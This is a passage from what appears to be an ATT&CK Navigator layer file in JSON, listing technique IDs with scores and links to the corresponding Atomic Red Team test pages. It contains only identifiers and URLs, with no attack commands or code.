cs/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-